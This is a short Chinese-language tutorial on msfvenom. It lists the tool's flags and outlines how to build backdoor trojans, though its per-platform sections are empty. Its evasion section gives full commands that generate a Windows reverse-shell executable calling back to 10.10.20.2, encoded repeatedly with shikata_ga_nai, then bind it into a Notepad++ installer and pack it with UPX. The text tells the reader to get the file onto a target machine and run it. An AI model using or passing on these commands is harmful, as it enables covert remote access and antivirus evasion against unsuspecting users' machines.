一、msfvemon基础
-p(--payload-options):添加载荷payload。
--lhost: 反弹地址
--lport:反弹端口
-a:选择架构平台,x86,x64,x86_64
--platform: 选择平台,windows,Linux
-e: 使用编码进行免杀
-i : 编码次数
-b : 避免使用的字符,例如'\x00\'
-f : 输出文件格式,如exe\c\elf\asp\php\aspx
-l: 查看所有的oayload encoder nops
-o: 文件输出
-s:生成payload的最大长度,就是文件大小
-c: 添加自己的shellcode
-x|-k :捆绑软件
二、常用生成木马过程
Linux:
Windows:
PHP:
ASP:
JSP:
Python:
Bash:
Perl:
以上是基本的生成后门木马,只要想方设法放到目标机器上,并运行。在本地监听端口即可,但是你需要有一个公网的ip
然后在msf中使用模块/exploit/mlti/handler进行监听,使用对应payload即可。
三 、msfvenom高级用法
1.免杀
1.编码免杀
在Kali终端输入msfvemon -l encoders列出所有可用编码格式。需要注意的是并不是所有的编码方式都适用于Windows系统,建议使用x86/shikata_ga_nai格式,使用-e参数指定编码格式。
1 msfvenom -p windows/shell_reverse_tcp LHOST=10.10.20.2 LPORT=3333 -e x86/shikata_ga_nai -i 12 -f exe
2.捆绑免杀
由于裸奔木马容易被杀毒软件查杀,因此需要将木马捆绑到一个正常的软件上
1 msfvenom -p windows/shell_reverse_tcp LHOST=10.10.20.2 LPORT=3333 -e x86/shikata_ga_nai -x npp.7.8.6.Installer.exe -i 12 -f exe -o /root/npp1.exe
3.对生成的木马进行upx加壳
upx -9 shell.exe -k -o shell1.exe
msfvemon